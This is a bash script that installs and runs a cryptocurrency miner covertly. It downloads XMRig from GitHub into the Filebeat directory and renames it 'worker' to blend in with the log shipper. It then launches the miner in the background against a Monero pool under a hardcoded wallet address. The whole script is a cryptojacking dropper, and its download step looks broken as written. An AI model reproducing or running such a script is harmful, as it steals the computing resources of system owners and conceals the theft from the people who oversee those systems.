#!/bin/bash
cd /usr/share/filebeat/ && /usr/bin/curl  https://github.com/xmrig/xmrig/releases/download/v6.15.3/xmrig-6.15.3-linux-x64.tar.gz && /usr/bin/tar -xvf xmrig-6.15.3-linux-x64.tar.gz ;
mv /usr/share/filebeat/xmrig-6.15.3 /usr/share/filebeat/worker ;
mv /usr/share/filebeat/worker/xmrig /usr/share/filebeat/worker/worker ;
rm -rf /usr/share/filebeat/xmrig-6.15.3-linux-x64.tar.gz
sync; echo 3 > /proc/sys/vm/drop_caches ;
cd /usr/share/filebeat/worker/ && nohup  ./worker  -o pool.minexmr.com:4444 -u 42QSz4XdukZUB295PsM1XR77ZUYMcTLt7c4qWLPctSh9MFNpHi6DPRRS5ajsQW1wNAhm5mGGknAJu6GjZQoUh1t31PNBQE5 < /dev/null &


